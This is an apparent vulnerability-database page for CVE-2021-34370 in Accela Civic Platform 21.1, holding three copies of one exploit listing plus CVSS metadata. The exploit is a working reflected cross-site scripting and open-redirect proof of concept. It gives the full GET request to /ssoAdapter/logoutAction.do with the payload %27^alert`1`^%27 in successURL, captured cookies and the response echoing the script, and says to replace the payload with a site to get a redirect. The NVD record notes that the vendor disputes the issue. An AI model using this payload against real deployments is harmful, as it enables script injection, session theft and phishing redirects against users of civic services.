Accela Civic Platform 21.1 - (successURL) Cross-Site-Scripting Vulnerability

2021-06-14T00:00:00

Description

{"id": "1337DAY-ID-36399", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Accela Civic Platform 21.1 - (successURL) Cross-Site-Scripting Vulnerability", "description": "", "published": "2021-06-14T00:00:00", "modified": "2021-06-14T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36399", "reporter": "Abdulazeez Alaseeri", "references": [], "cvelist": ["CVE-2021-34370"], "immutableFields": [], "lastseen": "2021-12-03T01:57:18", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-34370"]}, {"type": "exploitdb", "idList": ["EDB-ID:49990"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163115"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-34370"]}, {"type": "exploitdb", "idList": ["EDB-ID:49990"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163115"]}, {"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 5.6}, "sourceHref": "https://0day.today/exploit/36399", "sourceData": "# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)\n# Software Link: https://www.accela.com/civic-platform/\n# Version: <= 21.1\n# Author: Abdulazeez Alaseeri\n# Tested on: JBoss server/windows\n# Type: Web App\n# Date: 07/06/2021\n# CVE-2021-34370\n\n\n\n================================================================\nAccela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1\n================================================================\n\n\n================================================================\nRequest Heeaders start\n================================================================\n\nGET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1\n\nHost: Hidden\n\nCookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nUpgrade-Insecure-Requests: 1\n\nTe: trailers\n\nConnection: close\n\n================================================================\nRequest Heeaders end\n================================================================\n\n\n\n================================================================\nResponse Heeaders start\n================================================================\nHTTP/1.1 200 OK\n\nConnection: close\n\nSet-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter\n\nX-XSS-Protection: 0\n\nContent-Type: text/html;charset=ISO-8859-1\n\nContent-Length: 73\n\nDate: Tue, 08 Jun 2021 10:41:59 GMT\n\n\n\n<script type='text/javascript'>document.location=''^alert`1`^''</script>\n\n================================================================\nResponse Heeaders end\n================================================================\n\nPayload: %27^alert`1`^%27\n\nfor open redirect, replace the payload to a valid website.\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T18:41:38", "description": "** DISPUTED ** Accela Civic Platform through 20.1 allows ssoAdapter/logoutAction.do successURL XSS. NOTE: the vendor states \"there are configurable security flags and we are unable to reproduce them with the available information.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-09T12:15:00", "type": "cve", "title": "CVE-2021-34370", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34370"], "modified": "2021-10-18T11:52:00", "cpe": ["cpe:/a:accela:civic_platform:20.1"], "id": "CVE-2021-34370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34370", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:accela:civic_platform:20.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-14T15:59:48", "description": "", "cvss3": {}, "published": "2021-06-14T00:00:00", "type": "packetstorm", "title": "Accela Civic Platform 21.1 Cross Site Scripting / Open Redirection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-34370"], "modified": "2021-06-14T00:00:00", "id": "PACKETSTORM:163115", "href": "https://packetstormsecurity.com/files/163115/Accela-Civic-Platform-21.1-Cross-Site-Scripting-Open-Redirection.html", "sourceData": "`# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) \n# Software Link: https://www.accela.com/civic-platform/ \n# Version: <= 21.1 \n# Author: Abdulazeez Alaseeri \n# Tested on: JBoss server/windows \n# Type: Web App \n# Date: 07/06/2021 \n# CVE-2021-34370 \n \n \n \n================================================================ \nAccela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 \n================================================================ \n \n \n================================================================ \nRequest Heeaders start \n================================================================ \n \nGET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 \n \nHost: Hidden \n \nCookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true \n \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 \n \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \n \nAccept-Language: en-US,en;q=0.5 \n \nAccept-Encoding: gzip, deflate \n \nUpgrade-Insecure-Requests: 1 \n \nTe: trailers \n \nConnection: close \n \n================================================================ \nRequest Heeaders end \n================================================================ \n \n \n \n================================================================ \nResponse Heeaders start \n================================================================ \nHTTP/1.1 200 OK \n \nConnection: close \n \nSet-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter \n \nX-XSS-Protection: 0 \n \nContent-Type: text/html;charset=ISO-8859-1 \n \nContent-Length: 73 \n \nDate: Tue, 08 Jun 2021 10:41:59 GMT \n \n \n \n<script type='text/javascript'>document.location=''^alert`1`^''</script> \n \n================================================================ \nResponse Heeaders end \n================================================================ \n \nPayload: %27^alert`1`^%27 \n \nfor open redirect, replace the payload to a valid website. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163115/acp211-xss.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-01-13T05:29:06", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-14T00:00:00", "type": "exploitdb", "title": "Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34370", "2021-34370"], "modified": "2021-06-14T00:00:00", "id": "EDB-ID:49990", "href": "https://www.exploit-db.com/exploits/49990", "sourceData": "# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)\r\n# Software Link: https://www.accela.com/civic-platform/\r\n# Version: <= 21.1\r\n# Author: Abdulazeez Alaseeri\r\n# Tested on: JBoss server/windows\r\n# Type: Web App\r\n# Date: 07/06/2021\r\n# CVE-2021-34370\r\n\r\n\r\n\r\n================================================================\r\nAccela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1\r\n================================================================\r\n\r\n\r\n================================================================\r\nRequest Heeaders start\r\n================================================================\r\n\r\nGET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1\r\n\r\nHost: Hidden\r\n\r\nCookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true\r\n\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n\r\nAccept-Language: en-US,en;q=0.5\r\n\r\nAccept-Encoding: gzip, deflate\r\n\r\nUpgrade-Insecure-Requests: 1\r\n\r\nTe: trailers\r\n\r\nConnection: close\r\n\r\n================================================================\r\nRequest Heeaders end\r\n================================================================\r\n\r\n\r\n\r\n================================================================\r\nResponse Heeaders start\r\n================================================================\r\nHTTP/1.1 200 OK\r\n\r\nConnection: close\r\n\r\nSet-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter\r\n\r\nX-XSS-Protection: 0\r\n\r\nContent-Type: text/html;charset=ISO-8859-1\r\n\r\nContent-Length: 73\r\n\r\nDate: Tue, 08 Jun 2021 10:41:59 GMT\r\n\r\n\r\n\r\n<script type='text/javascript'>document.location=''^alert`1`^''</script>\r\n\r\n================================================================\r\nResponse Heeaders end\r\n================================================================\r\n\r\nPayload: %27^alert`1`^%27\r\n\r\nfor open redirect, replace the payload to a valid website.", "sourceHref": "https://www.exploit-db.com/download/49990", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

Accela Civic Platform 21.1 - (successURL) Cross-Site-Scripting Vulnerability

Description

Related